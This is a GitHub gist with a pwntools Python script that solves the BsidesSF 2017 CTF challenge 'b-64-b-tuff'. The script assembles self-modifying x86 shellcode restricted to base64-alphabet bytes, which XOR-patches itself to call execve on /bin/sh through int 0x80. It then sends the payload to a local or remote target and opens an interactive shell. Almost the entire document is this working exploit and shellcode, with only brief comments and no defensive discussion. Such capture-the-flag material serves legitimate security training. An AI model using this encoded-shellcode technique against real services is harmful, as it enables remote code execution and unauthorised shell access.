Skip to content

Instantly share code, notes, and snippets.

@Grazfather
Last active February 22, 2017 22:08
Show Gist options
  • Save Grazfather/df9bccf064dc80da0b907a617a127d5e to your computer and use it in GitHub Desktop.
Save Grazfather/df9bccf064dc80da0b907a617a127d5e to your computer and use it in GitHub Desktop.
BsidesSF 2017 CTF b-64-b-tuff solution
import sys
from pwn import *
def exploit():
r.recvuntil("start: ")
addr = r.recv(10)
addr = int(addr, 16)
print hex(addr)
valid = ['A', 'B', 'C', 'D', 'E', 'F', 'G', 'H', 'I', 'J', 'K', 'L', 'M', 'N', 'O', 'P', 'Q', 'R', 'S', 'T', 'U', 'V', 'W', 'X', 'Y', 'Z', 'a', 'b', 'c', 'd', 'e', 'f', 'g', 'h', 'i', 'j', 'k', 'l', 'm', 'n', 'o', 'p', 'q', 'r', 's', 't', 'u', 'v', 'w', 'x', 'y', 'z', '0', '1', '2', '3', '4', '5', '6', '7', '8', '9']
code = """
push eax
pop ecx # Use to store PC
push 0x58
pop eax
xor al, 0x58 # eax = 0
xor al, 0x7a
xor [ecx+0x42], al # XOR / in path
xor [ecx+0x43], al # XOR / in path
xor [ecx+0x4b], al # XOR / in path
xor al, 0x7a # eax = 0
xor al, 0x63
xor [ecx+0x50], al # XOR pop ebx
xor al, 0x63 # eax = 0
xor al, 0x54
xor [ecx+0x64], al # XOR sub al, 0x36
xor al, 0x54 # eax = 0
dec eax # eax = 0xffffff
xor [ecx+0x66], al # XOR first byte of syscall
xor [ecx+0x67], al # XOR second byte of syscall
push 0x58
pop eax
xor al, 0x58 # eax = 0
xor al, 0x4e
xor [ecx+0x67], al # XOR second byte of syscall
xor al, 0x66 # padding
xor al, 0x66 # padding
xor al, 0x66 # padding
xor al, 0x66 # padding
//xor eax,eax
push 0x58
pop eax
xor al, 0x58 # eax = 0
push eax
push 0x68735555 # needs patch
push eax
pop edx
push eax
pop edx
push 0x6e696255 # needs patch
// mov ebx,esp
push esp
//pop ebx # needs patch
.byte 0x38
//mov ecx,eax
push eax
pop ecx
// mov edx,eax
push eax
pop edx
xor al, 0x66 # padding
xor al, 0x66 # padding
xor al, 0x66 # padding
xor al, 0x66 # padding
xor al, 0x66 # padding
xor al, 0x66 # padding
//mov al, 0xb
push 0x41
pop eax
// sub al, 0x36 # 2b 36 Needs patch to 2b
.byte 0x78, 0x36
//int 0x80 = cd 80
.byte 0x32, 0x31 #int 0x80 after XORs
.byte 0x41 # padding
.byte 0x41 # padding
"""
sc = asm(code)
for b in sc:
if b not in valid:
print "{} ({:02x}) is not valid".format(b, ord(b))
print disasm(sc)
print sc
sc += "==="
r.send(sc.decode('base64'))
r.interactive()
if __name__ == "__main__":
log.info("For remote: %s HOST PORT" % sys.argv[0])
if len(sys.argv) > 1:
r = remote(sys.argv[1], int(sys.argv[2]))
exploit()
else:
r = process(["./b-64-b-tuff"], env={"LD_PRELOAD":""})
log.info("PID: {}".format(util.proc.pidof(r)))
gdb.attach(r)
exploit()
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment